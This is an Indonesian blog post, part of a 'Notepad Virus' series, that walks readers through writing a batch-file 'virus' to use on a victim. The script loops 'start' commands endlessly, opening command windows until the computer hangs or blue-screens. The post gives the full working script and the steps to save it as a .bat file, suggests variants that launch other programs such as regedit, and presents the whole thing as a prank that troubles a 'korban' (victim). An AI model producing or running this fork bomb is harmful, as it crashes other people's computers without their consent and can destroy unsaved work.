Cara Membuat Virus dengan Notepad #5 : 1000 CMDs

Notepad Virus #5 : 1000 CMDs

Cara Membuat Virus dengan Notepad #5 : 1000 CMDs | Di artikel Notepad Virus kali ini, saya akan memberikan perintah Batch/cmd sederhana tapi memiliki efek yang cukup nyusahin korban. Seperti namanya, 1000 CMDs artinya Virus ini akan membuka CMD sebanyak mungkin (kayaknya ga sampe 1000!?) sampe komputer ngelag.... kemudia ngehang... dan akhirnya muncul BLUE SCREEN OF THE DEATH, Iya si layar biru yang muncul ketika komputer udah ga 'kuat' lagi.

Sebenernya kalian bisa ngubah Virus ini supaya ngebuka program lain selain cmd, kaya Notepad, Regedit atau yang lainya. Kalian cukup tau aja dimana program yang kalian maksud berada. Yaudah langsung ke Langkah-Langkah bikin Virusnya..

Langkah-Langkah

1. Udah pasti, buka Notepad atau program tulis menulis kalian. Dan copas atau tuliskan perintah berikut.

@echo off
:MULAI
start
start
start
start
start
start
start
goto MULAI


NOTE : Kalian juga bisa ngubah Virus ini agar ngebuka program yang lain..., caranya tinggal masukin aja lokasi program yang kalian mau setelah perintah 'start' (semuanya). Contoh : 'start C:\Windows\regedit.exe', Maka Virusnya akan membuka regedit.

2. Lalu Save as dan typenya ubah jadi All files. Namain juga dengan akhiran atau ekstensi '.bat' contoh 'virus.bat'

Notepad Virus #5 : 1000 CMDs

 3. Untuk memastikan, silahkan cek Virus itu. Dan kalo berhasil..., nikmatin aja resikonya :). Dan maaf.., saya ga mau ngasih screenshot dari Virus ini.. :v :v.

Ok itu aja Notepad Virus kali ini. Kalian bisa liat artikel Virus lainya disini halaman ini. Follow juga Blog ini supaya ga ketinggalan artikel Notepad Virus lainya.., dan kalo ada pertanyaan silahkan curhat di Komentarr :v.

Notepad Virus #5 : 1000 CMDs

Subscribe to receive free email updates:

0 Response to "Cara Membuat Virus dengan Notepad #5 : 1000 CMDs"

Posting Komentar